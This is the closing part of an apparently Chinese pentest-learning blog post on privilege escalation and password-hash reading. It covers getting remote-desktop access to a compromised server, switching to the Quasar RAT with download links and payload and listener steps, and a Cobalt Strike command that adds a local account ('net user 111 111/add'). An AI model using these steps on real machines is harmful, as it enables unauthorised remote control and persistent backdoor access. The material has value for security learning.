&#x2F;f</span><br></pre></td></tr></table></figure>

<h4 id="服务器网络环境处于内网："><a href="#服务器网络环境处于内网：" class="headerlink" title="服务器网络环境处于内网："></a>服务器网络环境处于内网：</h4><p>解决办法：端口转发</p>
<h4 id="防护验证规则-IP-或计算机名："><a href="#防护验证规则-IP-或计算机名：" class="headerlink" title="防护验证规则/IP 或计算机名："></a>防护验证规则/IP 或计算机名：</h4><p>解决办法：找 IP/计算机名白名单。如果真遇上这种情况又找不着白名单的话，在 3389 这一块算是交代了，可以换一种思路，上远控：<br><a href="https://github.com/quasar/Quasar/releases" target="_blank" rel="noopener"><strong>QuasarRAT 远控</strong></a><strong><a href="https://www.yuque.com/attachments/yuque/0/2020/zip/258143/1596725366079-3f520eeb-811a-4114-a27e-426c2c156e79.zip?_lake_card=%7B%22uid%22%3A%221596610107559-0%22%2C%22src%22%3A%22https%3A%2F%2Fwww.yuque.com%2Fattachments%2Fyuque%2F0%2F2020%2Fzip%2F258143%2F1596725366079-3f520eeb-811a-4114-a27e-426c2c156e79.zip%22%2C%22name%22%3A%22Quasar.zip%22%2C%22size%22%3A625918%2C%22type%22%3A%22application%2Fx-zip-compressed%22%2C%22ext%22%3A%22zip%22%2C%22progress%22%3A%7B%22percent%22%3A99%7D%2C%22status%22%3A%22done%22%2C%22percent%22%3A0%2C%22id%22%3A%22ysDLg%22%2C%22card%22%3A%22file%22%7D">Quasar.zip</a></strong><br><strong>1、生成 payload</strong></p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/png/258143/1596610350819-1360ceed-cdbf-4c28-aa08-9b4938983618.png#align=left&display=inline&height=703&margin=%5Bobject%20Object%5D&name=image.png&originHeight=703&originWidth=835&size=98614&status=done&style=none&width=835" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>
<p>2、开启监听</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/png/258143/1596610363202-583ab935-4d08-48ac-8ff1-c2f74d90a3ee.png#align=left&display=inline&height=677&margin=%5Bobject%20Object%5D&name=image.png&originHeight=677&originWidth=733&size=135271&status=done&style=none&width=733" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>
<p><strong>需要靶机支持 dotnet4.0 环境，且使用管理员权限运行 payload。</strong></p>
<h1 id="注意："><a href="#注意：" class="headerlink" title="注意："></a>注意：</h1><p><strong>cobalt strike 添加账户需要使用 shell net user 111 111/add</strong><br><strong>不能使用 net user 111 111/add</strong><br><strong>否则出错</strong></p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/png/258143/1596604853921-977a6384-5251-46a9-8977-a9c08820f9be.png#align=left&display=inline&height=103&margin=%5Bobject%20Object%5D&name=image.png&originHeight=206&originWidth=519&size=13475&status=done&style=none&width=259.5" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>

<h1 id="学习文档"><a href="#学习文档" class="headerlink" title="学习文档"></a>学习文档</h1><p><a href="https://xz.aliyun.com/t/8054" target="_blank" rel="noopener">https://xz.aliyun.com/t/8054</a></p>

        </div>

        <blockquote class="post-copyright">
    
    <div class="content">
        
<span class="post-time">
    Last updated: <time datetime="2020-08-14T15:17:20.626Z" itemprop="dateUpdated">2020-08-14 23:17:20</time>
</span><br>


        
        这里可以写作者留言，标签和 hexo 中所有变量及辅助函数等均可调用，示例：<a href="/2020/08/06/gca6ds/" target="_blank" rel="external">https://www.yuque.com/xiaogege-yxttw/2020/08/06/gca6ds/</a>
        
    </div>
    
    <footer>
        <a href="https://www.yuque.com/xiaogege-yxttw">
            <img src="/img/avatar.jpg" alt="无名之辈">
            无名之辈
        </a>
    </footer>
</blockquote>

        
<div class="page-reward">
    <a id="rewardBtn" href="javascript:;" class="page-reward-btn waves-effect waves-circle waves-light">赏</a>
</div>



        <div class="post-footer">
            

            
<div class="page-share-wrap">
    

<div class="page-share" id="pageShare">
    <ul class="reset share-icons">
      <li>
        <a class="weibo share-sns" target="_blank" href="http://service.weibo.com/share/share.php?url=https://www.yuque.com/xiaogege-yxttw/2020/08/06/gca6ds/&title=《提权与hash读取》 — 小白帽&pic=https://www.yuque.com/xiaogege-yxttw/img/avatar.jpg" data-title="微博">
          <i class="icon icon-weibo"></i>
        </a>
      </li>
      <li>
        <a class="weixin share-sns wxFab" href="javascript:;" data-title="微信">
          <i class="icon icon-weixin"></i>
        </a>
      </li>
      <li>
        <a class="qq share-sns" target="_blank" href="http://connect.qq.com/widget/shareqq/index.html?url=https://www.yuque.com/xiaogege-yxttw/2020/08/06/gca6ds/&title=《提权与hash读取》 — 小白帽&source=" data-title=" QQ">
          <i class="icon icon-qq"></i>
        </a>
      </li>
      <li>
        <a class="facebook share-sns" target="_blank" href="https://www.facebook.com/sharer/sharer.php?u=https://www.yuque.com/xiaogege-yxttw/2020/08/06/gca6ds/" data-title=" Facebook">
          <i class="icon icon-facebook"></i>
        </a>
      </li>
      <li>
        <a class="twitter share-sns" target="_blank" href="https://twitter.com/intent/tweet?text=《提权与hash读取》 — 小白帽&url=https://www.yuque.com/xiaogege-yxttw/2020/08/06/gca6ds/&via=https://www.yuque.com/xiaogege-yxttw" data-title=" Twitter">
          <i class="icon icon-twitter"></i>
        </a>
      </li>
      <li>
        <a class="google share-sns" target="_blank" href="https://plus.google.com/share?url=https://www.yuque.com/xiaogege-yxttw/2020/08/06/gca6ds/" data-title=" Google+">
          <i class="icon icon-google-plus"></i>
        </a>
      </li>
    </ul>
 </div>



    <a href="javascript:;" id="shareFab" class="page-share-fab waves-effect waves-circle">
        <i class="icon icon-share-alt icon-lg"></i>
    </a>
</div>



        </div>
    </div>

    
<nav class="post-nav flex-row flex-justify-between">
  
    <div class="waves-block waves-effect prev">
      <a href="/2020/08/14/pq62c9/" id="post-prev" class="post-nav-link">
        <div class="tips"><i class="icon icon-angle-left icon-lg icon-pr"></i> Prev</div>
        <h4 class="title">反弹shell</h4>
      </a>
    </div>
  

  
    <div class="waves-block waves-effect next">
      <a href="/2020/08/06/rhhcg2/" id="post-next" class="post-nav-link">
        <div class="tips">Next <i class="icon icon-angle-right icon-lg icon-pl"></i></div>
        <h4 class="title">BadUSB制作</h4>
      </a>
    </div>
  
</nav>



    




















</article>

<div id="reward" class="page-modal reward-lay">
    <a class="close" href="javascript:;"><i class="icon icon-close"></i></a>
    <h3 class="reward-title">
        <i class="icon icon-quote-left"></i>
        谢谢大爷~
        <i class="icon icon-quote-right"></i>
    </h3>
    <div class="reward-content">
        
        <div class="reward-code">
            <img id="rewardCode" src="/img/wechat.jpg" alt="打赏二维码">
        </div>
        
        <label class="reward-toggle">
            <input id="rewardToggle" type="checkbox" class="reward-toggle-check"
                data-wechat="/img/wechat.jpg" data-alipay="/img/alipay.jpg">
            <div class="reward-toggle-ctrol">
                <span class="reward-toggle-item wechat">微信</span>
                <span class="reward-toggle-label"></span>
                <span class="reward-toggle-item alipay">支付宝</span>
            </div>
        </label>
        
    </div>
</div>



</div>

        <footer class="footer">
    <div class="top">
        
<p>
    <span id="busuanzi_container_site_uv" style='display:none'>
        站点总访客数：<span id="busuanzi_value_site_uv"></span>
    </span>
    <span id="busuanzi_container_site_pv" style='display:none'>
        站点总访问量：<span id="busuanzi_value_site_pv"></span>
    </span>
</p>


        <p>
            
            <span>This blog is licensed under a <a rel="license noopener" href="https://creativecommons.org/licenses/by/4.0/" target="_blank">Creative Commons Attribution 4.0 International License</a>.</span>
        </p>
    </div>
    <div class="bottom">
        <p><span>无名之辈 &copy; 2015 - 2020</span>
            <span>
                
                Power by <a href="http://hexo.io/" target="_blank">Hexo</a> Theme <a href="https://github.com/yscoder/hexo-theme-indigo" target="_blank">indigo</a>
            </span>
        </p>
    </div>
</footer>

    </main>
    <div class="mask" id="mask"></div>
<a href="javascript:;" id="gotop" class="waves-effect waves-circle waves-light"><span class="icon icon-lg icon-chevron-up"></span></a>



<div class="global-share" id="globalShare">
    <ul class="reset share-icons">
      <li>
        <a class="weibo share-sns" target="_blank" href="http://service.weibo.com/share/share.php?url=https://www.yuque.com/xiaogege-yxttw/2020/08/06/gca6ds/&title=《提权与hash读取》 — 小白帽&pic=https://www.yuque.com/xiaogege-yxttw/img/avatar.jpg" data-title="微博">
          <i class="icon icon-weibo"></i>
        </a>
      </li>
      <li>
        <a class="weixin share-sns wxFab" href="javascript:;" data-title="微信">
          <i class="icon icon-weixin"></i>
        </a>
      </li>
      <li>
        <a class="qq share-sns" target="_blank" href="http://connect.qq.com/widget/shareqq/index.html?url=https://www.yuque.com/xiaogege-yxttw/2020/08/06/gca6ds/&title=《提权与hash读取》 — 小白帽&source=" data-title=" QQ">
          <i class="icon icon-qq"></i>
        </a>
      </li>
      <li>
        <a class="facebook share-sns" target="_blank" href="https://www.facebook.com/sharer/sharer.php?u=https://www.yuque.com/xiaogege-yxttw/2020/08/06/gca6ds/" data-title=" Facebook">
          <i class="icon icon-facebook"></i>
        </a>
      </li>
      <li>
        <a class="twitter share-sns" target="_blank" href="https://twitter.com/intent/tweet?text=《提权与hash读取》 — 小白帽&url=https://www.yuque.com/xiaogege-yxttw/2020/08/06/gca6ds/&via=https://www.yuque.com/xiaogege-yxttw" data-title=" Twitter">
          <i class="icon icon-twitter"></i>
        </a>
      </li>
      <li>
        <a class="google share-sns" target="_blank" href="https://plus.google.com/share?url=https://www.yuque.com/xiaogege-yxttw/2020/08/06/gca6ds/" data-title=" Google+">
          <i class="icon icon-google-plus"></i>
        </a>
      </li>
    </ul>
 </div>


<div class="page-modal wx-share" id="wxShare">
    <a class="close" href="javascript:;"><i class="icon icon-close"></i></a>
    <p>扫一扫，分享到微信</p>
    <img src="" alt="微信分享二维码">
</div>




    <script src="//cdn.bootcss.com/node-waves/0.7.4/waves.min.js"></script>
<script>
var BLOG = { ROOT: '/', SHARE: true, REWARD: true };


</script>

<script src="//unpkg.com/hexo-theme-material-indigo@latest/js/main.min.js"></script>


<div class="search-panel" id="search-panel">
    <ul class="search-result" id="search-result"></ul>
</div>
<template id="search-tpl">
<li class="item">
    <a href="{path}" class="waves-block waves-effect">
        <div class="title ellipsis" title="{title}">{title}</div>
        <div class="flex-row flex-middle">
            <div class="tags ellipsis">
                {tags}
            </div>
            <time class="flex-col time">{date}</time>
        </div>
    </a>
</li>
</template>

<script src="//unpkg.com/hexo-theme-material-indigo@latest/js/search.min.js" async></script>






<script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>



<script>
(function() {
    var OriginTitile = document.title, titleTime;
    document.addEventListener('visibilitychange', function() {
        if (document.hidden) {
            document.title = '死鬼去哪里了！';
            clearTimeout(titleTime);
        } else {
            document.title = '(つェ⊂)咦!又好了!';
            titleTime = setTimeout(function() {
                document.title = OriginTitile;
            },2000);
        }
    });
})();
</script>



	<script type="text/javascript" src="hexo_resize_image.js"></script>
</body>
</html>
